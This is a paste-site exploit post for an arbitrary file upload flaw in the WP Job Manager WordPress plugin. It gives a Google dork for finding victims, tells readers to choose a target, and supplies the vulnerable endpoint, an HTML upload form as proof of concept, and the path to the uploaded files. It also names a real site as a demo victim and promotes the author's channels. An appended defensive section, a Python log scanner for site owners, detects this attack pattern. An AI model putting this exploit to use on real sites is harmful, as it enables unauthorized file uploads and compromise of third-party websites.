Professional-hacker

WordPress Plugins WP Job Manager - Arbitrary File Upload

Jun 2nd, 2017
##################################################JokerSecurity#########################################################
# Title : WordPress Plugins WP Job Manager - Arbitrary File Upload
# Dork : inurl:/wp-content/plugins/wp-job-manager/
# Tested on: [ BlackBuntu ]
# MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
# Myblog : http://kader-information.blogspot.com/
######################
# [+] DESCRIPTION :
######################

# 1 : Search Google Dork and Choose a Target

# 2 : Exploit :
========
https://localhost/jm-ajax/upload_file/
Vulnerability :
=======
FormCraft {"files":[]}

# 3 : PoC :
====
<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

# 4 : Upload Your File -=-=-=-=-=- File.jpg

# 5 : File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg

######
Demo :
######
http://snuviktechnologies.com

######################

Subscribe to my channel and my Facebook page

# Website : http://dev-labs.co

# My Blogger : http://kader-information.blogspot.com/

# Page Facebook 1 : https://www.facebook.com/AnonymousPalestine.vip

# Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/


By <3

##################################################JokerSecurity#########################################################
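For site owners, an added example (not part of the original paste) that scans a web access log for the upload endpoint and the upload directory named above. It assumes Combined Log Format; the extension lists and the sample log lines are constructed for illustration.

```python
import re

# The two paths come from the paste; the extension lists are this example's assumptions.
UPLOAD_ENDPOINT = "/jm-ajax/upload_file"
UPLOAD_DIR = "/wp-content/uploads/job-manager-uploads/"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"}
SCRIPT_EXT = {"php", "php5", "phtml", "phar", "cgi", "pl", "asp", "aspx", "jsp"}

# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation-range addresses, invented file names).
_T = "[02/Jun/2017:10:00:00 +0000]"
_D = UPLOAD_DIR + "files/2017/06/"
SAMPLE = [
    f'203.0.113.7 - - {_T} "POST /jm-ajax/upload_file/ HTTP/1.1" 200 85 "-" "-"',
    f'203.0.113.7 - - {_T} "GET {_D}cv.jpg HTTP/1.1" 200 5120 "-" "-"',
    f'198.51.100.9 - - {_T} "GET {_D}logo.php.jpg HTTP/1.1" 200 312 "-" "-"',
    f'198.51.100.9 - - {_T} "GET {_D}photo.png HTTP/1.1" 200 900 "-" "-"',
    f'192.0.2.4 - - {_T} "GET /index.php HTTP/1.1" 200 4000 "-" "-"',
]

def unexpected_type(path):
    """True when the file name has no allowed final extension or hides a script one."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1].lower()
    exts = name.split(".")[1:]
    return not exts or exts[-1] not in ALLOWED_EXT or any(e in SCRIPT_EXT for e in exts)

def scan(lines):
    """Return (ip, kind, path) findings for successful (HTTP 200) requests."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(4) != "200":
            continue
        ip, method, path, _status = m.groups()
        if method == "POST" and path.startswith(UPLOAD_ENDPOINT):
            uploaders.add(ip)                      # remember who used the endpoint
            findings.append((ip, "upload", path))
        elif path.startswith(UPLOAD_DIR):
            if unexpected_type(path):
                findings.append((ip, "unexpected-type", path))
            elif ip in uploaders:
                findings.append((ip, "fetch-after-upload", path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

The "upload" and "fetch-after-upload" findings also match ordinary applicants using the form, so treat them as review items; "unexpected-type" is the stronger signal.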